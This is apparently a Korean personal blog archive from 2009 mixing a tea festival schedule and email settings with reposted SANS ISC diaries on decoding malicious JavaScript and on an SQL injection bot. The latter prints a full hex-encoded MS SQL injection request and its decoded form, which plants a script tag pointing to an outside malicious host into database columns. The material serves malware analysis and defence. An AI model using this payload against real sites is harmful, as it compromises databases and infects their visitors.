맘데로2009. 5. 21. 10:51

있네.. 헐~

이강석님이 소유자네..

attack.kr 도 있네.


attacker.kr 은 없는데
등록이나 해볼까?

Posted by 김주일

아주 잘 명확하게 설명되어 있음.

시간이 나야 테스트를 해보곤 할껀데..ㅜㅜ


Posted by 김주일


써먹을 때가 있겠지.
Posted by 김주일

구글링 자료

작성분에게 감사를 표합니다.
Posted by 김주일
아래의 그림은 썬더버드의 기준임.

도구 >> 계정 >> 계정 설정에서 아래와 같이 설정 부탁.

Posted by 김주일
맘데로2009. 5. 10. 00:16

※ 본 행사 일정 및 프로그램은 사정에 따라 변경될 수 있습니다.

5.7.(목)

5.8.(금)

5.9.(토)

5.10.(일)

5.11.(월)

한국차소리문화공원 행사장

09:00
~10:00
- 전야제준비
(실내체육관)
- 향우맞이
- 식전공연
(보성읍시가지 )
- 거리퍼레이드
(고적대,농악공연)
- 창작예술단공연
- 대금연주
- 오카리나 연주
오 픈 오 픈 오 픈
- 난타공연
- 선비차다례시연
- 하늘땅줄넘기 - 다향백일장 및 사생대회
10:00
~11:00
- 전국학생차예절
경연대회
- 차음식만들기
경연대회(부스)
- 녹차만들기
경연대회(부스)
- 일림산철쭉제례
(일림산)
11:00
~12:00
- 개막식
- 개회선언, 군민상시상
- 다신제
- 헌다, 국악공연
- 풍다기원
12:00
~13:00
- 대북, 가야금병창 공연
- 녹차캔 마시기 대회
- 녹차캔 높이쌓기
- 단체줄넘기
- 윳놀이
- 줄다리기
- 박터뜨리기
- 공중 줄타기 공연
- 녹차밭 푸른 음악회(1회)
- 한국명차선정대회 (부스)
- 지역민속공연
- 모듬북, 판소리
13:00
~14:00
- 객석마당
- 녹차캔 높이쌓기
- 객석마당
- 녹차캔 높이쌓기
14:00
~15:00
- 한중일차문화교류전
- 다례시연(6팀)
- 폐막식
- 이쁜이공연단
- 실버댄스
15:00
~16:00
- 녹차밭 푸른
음악회(2회)
- 녹차밭상설공연
- 녹차 학술세미나 (소리전수관)
- 녹차밭상설공연
우리가락우리마당
풍류락락
16:00
~17:00
17:00
~18:00
- 축하공연
- 초대가수공연
( TV녹화방송)
- 불꽃쇼
18:00
~19:00
- 다향의밤
(실내체육관)
- 축하불꽃쇼
- 녹차밭추억 캠프촌 입소(2차)
- 캠프음악회
- 전국차인의 밤
(실내체육관)
- 녹차밭추억
캠프촌입소(3차)
- 캠프파이어
- 캠프음악회
- 녹차밭추억 캠프촌입소(1차)
- 캠프파이어
- 캠프음악회
19:00
~20:00
 

일시
(시간)

차문화행사 (행사장부스)

일림산
철쭉제(5종)

전시 및 경연(9종)

체험마당(16)

5.8. ~
5.11.
(10:00 ~ 18:00)

30종
- 보성차전시할인전
- 농수특산품전시
- 차예복전시
- 친환경유기녹차생산선언
- 보성분청사기 및 전국 덤벙이전시
- 발효차 전시체험관
- 녹차만들기 경연대회
- 차음식만들기경연대회
- 한국명차선정대회
- 차잎따기체험
- 차만들기체험
- 녹차떡만들기체험
- 녹차묘목심어가기체험
- 녹차음료시음
- 녹차캔쌓기
- 녹차밭추억캠프
- 녹차김치만들기체험
- 녹차풍선아트
- 녹차뷰티건강 체험
- 가훈써가기체험
- 녹차음식시식체험
- 녹차초코렛만들기체험
- 녹차페이스페인팅
- 녹차밭그린우체국
- 녹차미인쌀밥시식회
- 외국차만들기시연

- 산사랑리본달기
- 임업장비전시
- 일림산 생태본전시
- 자연사랑전시전
- 야생화 전시 등

 
출 처 : http://dahyang.boseong.go.kr/dahyang2005/
Posted by 김주일
맘데로2009. 5. 3. 23:19
Posted by 김주일
This page was put together to accompany my SANS ISC diary entry on "Javascript Decoding" (see https://isc2.sans.org/diary.html?storyid=2268) and the corresponding example page. If you haven't done so yet, please read the diary first.

Warning! The links on this page contain exploit code. Mind you, exploit code which has been changed very slightly and should not be harmful anymore, but it *is* exploit code, and as such it might possibly trigger your anti-virus. What I'm aiming at: Work through the examples on this page from a LAB PC which is not connected to your production network. And don't complain to me or SANS ISC if clicking on anything on this page makes your computer turn out scrambled instead of sunny side up.

The Starting Point
The original, encoded exploit page was found after unraveling a long set of exploits and IFRAMES. I picked this one as example because it shows an encoding technique that is not in all that widespread use:

Download the original file if you want to reproduce the next steps on your own! Do a right-click "save link as", or you'll end up with an empty page. The "function" calls within the file were renamed to "funkyon", and the two "eval" statements were renamed into a more fitting "evil" to keep them from triggering by accident. Note:You'll have to change "funkyon" back to "function", and "evil" back to "eval" in the file (once downloaded) if you want to play with the file!

Step #1 - Applying the "Monkey Wrench"
The above code is clearly too messy to try to use the Perl-Fu method. Not knowing really what is hidden inside, and leery of the many bad guys who have started to seed their spoits with a </textarea> tag to break out of the "Liston Method" textarea jail, this leaves the "Monkey Wrench" as a good try. A quick edit replaces the first "eval" with a "print", and then:
daniel@debian:~$ js 0614.txt > stage1.txt
which results in something like this:
stage1

Step #2 - Unwrapping the Octal code"
The resulting block shown above is still encoded, but in a far easier format. You might notice that the code only uses figures between 0 and 7, which is a tell-tale indicator that the numbers are encoded in the octal numbering system. To unwrap this block you can easily use the "Monkey Wrench" again, all you have to do is replace the initial "eval" with a "print" and feed the code block into "js".For didactical :) purposes, I'm going to use the Perl-Fu method on this stage, though:
daniel@debian:~$ cat stage1.txt | perl -pe 's/\\(\d+)/chr(oct($1))/ge'
does the trick. oct() converts the octal number to decimal, and chr() turns the decimal ascii code into a printable character. The result is something like this:
stage2

The exploit obviously tries to download and run "down.exe" off the same site.

출 처 : http://handlers.sans.org/dwesemann/decode/exercise.html
Posted by 김주일
Couple of days ago fellow handler Scott wrote a diary about sites hosting exploits for various Realplayer vulnerabilities. One of the malicious sites mentioned in the article, uc8010.com looked particulary interesting. When you search for this web site in Google you get thousands of other, compromised sites that are all pointing to the uc8010.com web site. This, obviously, sparked some interest in the security community so we decided to dig a bit further into this attack.

It turned out that there is an automated script or a bot exploiting SQL injection attacks in vulnerable web applications. I remembered that I saw the very same attack appearing back in November last year but it was not this wide spread – it appears that the attacker improved the crawling/attacking function of his bot so he managed to compromise more web sites.

The attack back from November 2007 was almost exactly the same as the current one, but the SQL statement appears to be a bit improved. One of the logs that we received back in November is shown below:

GET /home/site_content_3.asp

s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C0061007200650
0200040006D00200076006100720063006800610072002800380030003000300029003B007300650
07400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D0
02B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D0
07300650074005B0027002B0062002E006E0061006D0065002B0027005D003D00720074007200690
06D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0
062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740
020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650
074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0
027002000660072006F006D002000640062006F002E007300790073006F0062006A0065006300740
07300200061002C00640062006F002E0073007900730063006F006C0075006D006E0073002000620
02C00640062006F002E0073007900730074007900700065007300200063002000770068006500720
06500200061002E00690064003D0062002E0069006400200061006E006400200061002E007800740
07900700065003D0027005500270061006E006400200062002E00780074007900700065003D00630
02E0078007400790070006500200061006E006400200063002E006E0061006D0065003D002700760
061007200630068006100720027003B00730065007400200040006D003D005200450056004500520
053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720
069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250
027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D00520
0450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B0
0%20AS%20NVARCHAR(4000));EXEC(@S);--

As you can see, we can't tell much what's going on here. The attackers were smart and decided to obfuscate the attack by using the CAST statement. The CAST statement explicitly converts one data type to another. So, the attackers CAST the big input value as "@S" and then execute it. In this example, the site_content_3.asp script is vulnerable to SQL injection (notice the ' character after s=290, which is an input parameter for the site_content_3.asp script).

Back to the CAST statement. We can decode this simply with perl, we just need to copy the CAST content into a separate line and do something like this:

$ perl -pe 's/(..)00/chr(hex($1))/ge' < input > output

The output file will contain the decoded SQL statement:

declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';'
from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';
set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);

And here we can see exactly what's going on. This SQL statement takes all rows from the sysobjects table with type U (user table). It then cycles through those objects and matches those that with type „varchar“. Finally, for every such object it executes an update statement which results in appending the code shown above pointing to the yl18.net site.

The attack with the uc8010.com site was practically the same with a bit better SQL – Ryan Barnett posted an example of this attack at http://www.modsecurity.org/blog/

As some people noticed, almost all affected web sites are running IIS and MS SQL server. This makes sense since the SQL statement in the attack will work only on MS SQL servers and there aren't that many web sites running Apache on Windows. That being said, I have no doubt that the bad guys will expand their bot (if they haven't already) so it starts attacking PHP+MySQL web sites.

This is another example that points to issues with development of web applications (see the OWASP top ten vulnerability list for 2007 – injection flaws are on the second place http://www.owasp.org/index.php/Top_10_2007-A2#Protection). One could also protect against attacks such as this one with a reverse proxy/web application firewall in front of the web server. However, be aware that this is just a temporary fix – as we saw in this example the bad guys are pretty good in evading detection, as they did with the CAST statement (sure, you can block on CAST but be aware that there are other obfuscation ways).

Posted by 김주일
시스템2009. 4. 28. 17:07



먼말인지는 모르고 그냥 영상만 봄.

출 처 : http://www.youtube.com/watch?v=r2h6w61-c74
Posted by 김주일